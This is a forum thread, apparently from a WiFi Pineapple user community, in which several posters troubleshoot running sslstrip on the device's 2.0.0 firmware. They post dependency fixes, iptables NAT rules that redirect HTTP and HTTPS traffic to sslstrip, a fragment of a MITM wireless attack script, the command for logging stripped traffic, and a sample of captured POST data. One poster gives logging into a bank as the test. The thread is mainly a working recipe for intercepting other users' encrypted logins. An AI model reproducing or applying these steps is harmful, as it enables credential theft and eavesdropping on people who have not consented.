Jump to content

Firmware 2.0.0 Sslstrip


Recommended Posts

I flashed 2.0.0 and have managed to get everything reconfigured how I had before and have been trying to get sslstrip to work as it is supposed to work now. I installed sslstrip 0.7.1 from opkgmanager and got this error when I tried to run it from cl:

Traceback (most recent call last):
  File "/usb/usr/bin/sslstrip", line 27, in <module>
    from twisted.web import http
  File "/usb/usr/lib/python2.7/site-packages/twisted/__init__.py", line 22, in <module>
    raise ImportError("you need zope.interface installed "
ImportError: you need zope.interface installed (http://zope.org/Products/ZopeInterface/)

As you can see it wants me to install zope-interface but I checked to see if I needed it and it is already installed on my pineapple. And also I'm not sure if it's giving me an error with twisted-web but I do have it installed. If anyone could help that would be great.

Link to comment
Share on other sites

Okay, make sure you installed sslstrip to USB through opkg to make sure all the dependencies are there.

Then execute the following in shell:

ln -s /usb/usr/lib/python2.7 /usr/lib/python2.7

touch /usb/usr/lib/python2.7/site-packages/zope/__init__.py

Should work after that.

Link to comment
Share on other sites

I can confirm on 2.0.0 doing a fresh install of the firmware, installing all available modules, then opening the opkg module and installing "sslstrip". Then running sslstrip will produce the above error. To resolve the error execute:

ln -s /usb/usr/lib/python2.7 /usr/lib/python2.7

touch /usb/usr/lib/python2.7/site-packages/zope/__init__.py

This is just to get SSL strip to run, you still will need to execute the iptables command to redirect the traffic to sslstrip's port.

Link to comment
Share on other sites

....

This is just to get SSL strip to run, you still will need to execute the iptables command to redirect the traffic to sslstrip's port.

Will this work?

iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 127.0.0.1:10000
iptables -t nat -A PREROUTING -p tcp --dport 443 -j DNAT --to-destination 127.0.0.1:10000

Link to comment
Share on other sites

From what I've read this is the command to use for redirecting traffic to sslstrip.

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

But from what I've tried so far I cannot get this to work. It is not stripping SSL from the connections and just in general not working.

Edited by E1337Recon
Link to comment
Share on other sites

From what I've read this is the command to use for redirecting traffic to sslstrip.

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

But from what I've tried so far I cannot get this to work. It is not stripping SSL from the connections and just in general not working.

That will only redirect HTTP traffic, not ssl traffic.

Here's a piece of the script that I ran in BT for MITM wireless attacks:

iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o $IFACE -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
iptables -t nat -A PREROUTING -p tcp --destination-port 443 -j REDIRECT --to-ports 10000

*EDIT*

Here's the full script:

http://pastebin.com/Dyh9C6EB

Edited by legion
Link to comment
Share on other sites

From what I've read this is the command to use for redirecting traffic to sslstrip.

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

But from what I've tried so far I cannot get this to work. It is not stripping SSL from the connections and just in general not working.

What command are you running for sslstrip? Just sslstrip without any switches?

You will want to issue the iptables command above, then "sslstrip -w /usb/sslstrip.log" or something to that effect, you will see nothing on the console command for sslstrip it will all be contained in the log file. Then try logging into your bank, it works, you should see:

"{DATE} {TIME} SECURE POST Data ({WEBSITE}):{DATA STREAM}"

Link to comment
Share on other sites

What am I doing wrong?

root@Pineapple:~# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
root@Pineapple:~# sslstrip -w sslstrip.log
/usb/usr/lib/python2.6/site-packages/twisted/internet/_sslverify.py:4: DeprecationWarning: the md5 module is deprecated; use hashlib instead
Traceback (most recent call last):
  File "/usb/usr/bin/sslstrip", line 30, in <module>
    from sslstrip.StrippingProxy import StrippingProxy
ImportError: No module named sslstrip.StrippingProxy
root@Pineapple:~# 

**EDIT**

Got it running by executing:


python /usb/sslstrip/sslstrip.py -a -k -f

Edited by legion
Link to comment
Share on other sites

  • 5 weeks later...

What command are you running for sslstrip? Just sslstrip without any switches?

You will want to issue the iptables command above, then "sslstrip -w /usb/sslstrip.log" or something to that effect, you will see nothing on the console command for sslstrip it will all be contained in the log file. Then try logging into your bank, it works, you should see:

"{DATE} {TIME} SECURE POST Data ({WEBSITE}):{DATA STREAM}"

I AM RUNNING FIRMWARE 2.1.0....DO I NEED TO RUN THE COMMAND "sslstrip -w /usb/sslstrip.log" ALSO, WHEN DO I ADD THE IPTABLES COMMAND...BEFORE I START SSLSTRIP OR AFTER?

Edited by abxy007
Link to comment
Share on other sites

I AM RUNNING FIRMWARE 2.1.0....DO I NEED TO RUN THE COMMAND "sslstrip -w /usb/sslstrip.log" ALSO, WHEN DO I ADD THE IPTABLES COMMAND...BEFORE I START SSLSTRIP OR AFTER?

the easy way would be to use Whistle Master's module sslstrip, it configures everything needed, other than installing sslstrip to the usb

Link to comment
Share on other sites

the easy way would be to use Whistle Master's module sslstrip, it configures everything needed, other than installing sslstrip to the usb
thanks for the info let me get this right

1 install sslstrip module to pineapple instead if usb

2 run module (forwards logs first)

3 issue iptables command crap

4 watch the magic

does that sum it up in a nutshell?

Edited by abxy007
Link to comment
Share on other sites

thanks for the info let me get this right

1 install sslstrip module to pineapple instead if usb

2 run module (forwards logs first)

3 issue iptables command crap

4 watch the magic

does that sum it up in a nutshell?

ok here is what you do

#1 set up your thumb drive according to the guide found here in these forums.

#2 with ics working ssh in and issue

opkg update
opkg --dest usb install sslstrip

#3 install Whistle Master's module sslstrip internal or usb

#4 just run it within the module from now on

Edited by petertfm
Link to comment
Share on other sites

ok here is what you do

#1 set up your thumb drive according to the guide found here in these forums.

#2 with ics working ssh in and issue

opkg update
opkg --dest usb install sslstrip

#3 install Whistle Master's module sslstrip internal or usb

#4 just run it within the module from now on

thanks heres what i got

2012-06-05 10:42:23,853 POST Data (su.ff.avast.com):

!xœsJLQJ-,M-.nts.google.com):
goog-malware-shavar;a:70649-80675:s:76801-86262:mac
goog-phish-shavar;a:210081-215756:s:98770-101489:mac
goog-badbinurl-shavar;a:137-5514:s:61-4658:mac
goog-csdwhite-sha256;a:1-23:s:1:mac
goog-downloadwhite-digest256;a:1-27:s:1-3:mac

2012-06-05 12:27:50,055 POST Data (safebrowsing.clients.google.com):
goog-malware-shavar;a:70656-80677:s:76801-86263:mac
goog-phish-shavar;a:210081-215761:s:98770-101494:mac
goog-badbinurl-shavar;a:137-5514:s:61-4658:mac
goog-csdwhite-sha256;a:1-23:s:1:mac
goog-downloadwhite-digest256;a:1-27:s:1-3:mac

does this look right

Link to comment
Share on other sites

thanks heres what i got

2012-06-05 10:42:23,853 POST Data (su.ff.avast.com):

!xœsJLQJ-,M-.nts.google.com):
goog-malware-shavar;a:70649-80675:s:76801-86262:mac
goog-phish-shavar;a:210081-215756:s:98770-101489:mac
goog-badbinurl-shavar;a:137-5514:s:61-4658:mac
goog-csdwhite-sha256;a:1-23:s:1:mac
goog-downloadwhite-digest256;a:1-27:s:1-3:mac

2012-06-05 12:27:50,055 POST Data (safebrowsing.clients.google.com):
goog-malware-shavar;a:70656-80677:s:76801-86263:mac
goog-phish-shavar;a:210081-215761:s:98770-101494:mac
goog-badbinurl-shavar;a:137-5514:s:61-4658:mac
goog-csdwhite-sha256;a:1-23:s:1:mac
goog-downloadwhite-digest256;a:1-27:s:1-3:mac

does this look right

you will have to ask this in the sslstrip module forum, I don't have a lot of experience with it

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

 Share

  • Recently Browsing   0 members

    No registered users viewing this page.

×
×
  • Create New...